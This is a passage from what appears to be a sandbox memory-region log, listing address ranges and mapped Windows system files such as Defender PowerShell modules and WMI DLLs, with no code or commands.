"c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 3549 start_va = 0x1a9c0000 end_va = 0x1a9c3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mpsignature.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpsignature.cdxml") Region: id = 3550 start_va = 0x1a9c0000 end_va = 0x1a9c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 3551 start_va = 0x1a9c0000 end_va = 0x1a9c3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mpwdoscan.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpwdoscan.cdxml") Region: id = 3552 start_va = 0x1a9c0000 end_va = 0x1a9c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 3553 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3554 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3555 start_va = 0x1b870000 end_va = 0x1b87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b870000" filename = "" Region: id = 3556 start_va = 0x1b880000 end_va = 0x1b88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b880000" filename = "" Region: id = 3557 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3558 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3559 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3560 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3561 start_va = 0x7fff48210000 end_va = 0x7fff4821ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48210000" filename = "" Region: id = 3562 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3563 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3564 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3565 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3566 start_va = 0x1abe0000 end_va = 0x1abeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abe0000" filename = "" Region: id = 3567 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3568 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3569 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3570 start_va = 0x1b870000 end_va = 0x1b87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b870000" filename = "" Region: id = 3571 start_va = 0x1b880000 end_va = 0x1b88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b880000" filename = "" Region: id = 3572 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3573 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 3574 start_va = 0x1b8b0000 end_va = 0x1b8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8b0000" filename = "" Region: id = 3575 start_va = 0x1b8c0000 end_va = 0x1b8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8c0000" filename = "" Region: id = 3576 start_va = 0x1b8d0000 end_va = 0x1b8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8d0000" filename = "" Region: id = 3577 start_va = 0x1b8e0000 end_va = 0x1b8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8e0000" filename = "" Region: id = 3578 start_va = 0x1b8f0000 end_va = 0x1b8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8f0000" filename = "" Region: id = 3579 start_va = 0x1b900000 end_va = 0x1b90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b900000" filename = "" Region: id = 3580 start_va = 0x1b910000 end_va = 0x1b91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b910000" filename = "" Region: id = 3581 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3582 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3583 start_va = 0x1abe0000 end_va = 0x1abeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abe0000" filename = "" Region: id = 3584 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3585 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3586 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3587 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3588 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3589 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3590 start_va = 0x1abe0000 end_va = 0x1abeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abe0000" filename = "" Region: id = 3591 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3592 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3593 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3594 start_va = 0x1abe0000 end_va = 0x1abeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abe0000" filename = "" Region: id = 3595 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3596 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3597 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3598 start_va = 0x1b870000 end_va = 0x1b87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b870000" filename = "" Region: id = 3599 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3600 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3601 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3602 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3603 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3604 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3605 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3606 start_va = 0x1abe0000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abe0000" filename = "" Region: id = 3800 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3801 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3802 start_va = 0x1b870000 end_va = 0x1b87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b870000" filename = "" Region: id = 3803 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3804 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3805 start_va = 0x1b870000 end_va = 0x1b87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b870000" filename = "" Region: id = 3806 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3807 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3808 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3809 start_va = 0x1b870000 end_va = 0x1b87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b870000" filename = "" Region: id = 3810 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3811 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3812 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3813 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3814 start_va = 0x1b870000 end_va = 0x1b87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b870000" filename = "" Region: id = 3815 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3816 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3817 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3818 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3819 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3820 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3821 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3822 start_va = 0x1abe0000 end_va = 0x1abeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abe0000" filename = "" Region: id = 3823 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3824 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3825 start_va = 0x1abe0000 end_va = 0x1abeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abe0000" filename = "" Region: id = 3826 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3827 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3828 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3829 start_va = 0x1abe0000 end_va = 0x1abeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abe0000" filename = "" Region: id = 3830 start_va = 0x7fffae420000 end_va = 0x7fffae4c4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.management.infrastructure.native.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.M870d558a#\\3848311070796cb1ab1cbaa71369c098\\Microsoft.Management.Infrastructure.Native.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.m870d558a#\\3848311070796cb1ab1cbaa71369c098\\microsoft.management.infrastructure.native.ni.dll") Region: id = 3831 start_va = 0x7fffbc8d0000 end_va = 0x7fffbc8d8fff monitored = 0 entry_point = 0x7fffbc8d2310 region_type = mapped_file name = "microsoft.management.infrastructure.native.unmanaged.dll" filename = "\\Windows\\System32\\Microsoft.Management.Infrastructure.Native.Unmanaged.dll" (normalized: "c:\\windows\\system32\\microsoft.management.infrastructure.native.unmanaged.dll") Region: id = 3832 start_va = 0x7fffbdcd0000 end_va = 0x7fffbdcf2fff monitored = 0 entry_point = 0x7fffbdcd20b0 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 3833 start_va = 0x7fffbdc70000 end_va = 0x7fffbdccffff monitored = 0 entry_point = 0x7fffbdc729d0 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 3834 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3835 start_va = 0x7fffbdc30000 end_va = 0x7fffbdc60fff monitored = 1 entry_point = 0x7fffbdc32ef0 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 3836 start_va = 0x7fffc9270000 end_va = 0x7fffc9279fff monitored = 0 entry_point = 0x7fffc9271850 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 3837 start_va = 0x1abe0000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abe0000" filename = "" Region: id = 3838 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3839 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3840 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3841 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3842 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3843 start_va = 0x1b870000 end_va = 0x1b87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b870000" filename = "" Region: id = 3844 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3845 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3846 start_va = 0x1a9c0000 end_va = 0x1a9c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001a9c0000" filename = "" Region: id = 3847 start_va = 0x7fffb4d40000 end_va = 0x7fffb4d50fff monitored = 0 entry_point = 0x7fffb4d42aa0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3848 start_va = 0x7fffbe330000 end_va = 0x7fffbe3b5fff monitored = 0 entry_point = 0x7fffbe345570 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3850 start_va = 0x1b870000 end_va = 0x1b8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b870000" filename = "" Region: id = 3851 start_va = 0x1a9d0000 end_va = 0x1a9d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001a9d0000" filename = "" Region: id = 3852 start_va = 0x7fffb4780000 end_va = 0x7fffb4793fff monitored = 0 entry_point = 0x7fffb4781800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 3853 start_va = 0x7fffb4820000 end_va = 0x7fffb492afff monitored = 0 entry_point = 0x7fffb4855c10 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 3855 start_va = 0x1abe0000 end_va = 0x1abecfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001abe0000" filename = "" Region: id = 3857 start_va = 0x1abe0000 end_va = 0x1abe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001abe0000" filename = "" Region: id = 3862 start_va = 0x1abf0000 end_va = 0x1abf5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001abf0000" filename = "" Region: id = 3865 start_va = 0x1ac00000 end_va = 0x1ac08fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001ac00000" filename = "" Region: id = 3867 start_va = 0x1ac00000 end_va = 0x1ac04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001ac00000" filename = "" Region: id = 3868 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3869 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3870 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3873 start_va = 0x1b8f0000 end_va = 0x1b92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8f0000" filename = "" Region: id = 3874 start_va = 0x7fff48220000 end_va = 0x7fff4822ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48220000" filename = "" Region: id = 3875 start_va = 0x1abf0000 end_va = 0x1abf5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001abf0000" filename = "" Region: id = 3876 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3877 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3878 start_va = 0x1b930000 end_va = 0x1b9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b930000" filename = "" Region: id = 3879 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3880 start_va = 0x1b9b0000 end_va = 0x1ba2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b9b0000" filename = "" Region: id = 3881 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3882 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3883 start_va = 0x1ba30000 end_va = 0x1baaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ba30000" filename = "" Region: id = 3884 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3885 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3886 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3887 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3888 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3889 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3890 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3891 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3892 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3893 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3894 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3895 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3896 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3897 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3898 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3899 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3900 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3901 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3902 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3903 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3904 start_va = 0x1bab0000 end_va = 0x1babffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bab0000" filename = "" Region: id = 3905 start_va = 0x1bac0000 end_va = 0x1bacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bac0000" filename = "" Region: id = 3906 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3907 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3908 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3909 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3910 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3911 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3912 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3913 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3914 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3915 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 3916 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3917 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3918 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3919 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3920 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3921 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3922 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3923 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 3924 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 3925 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = 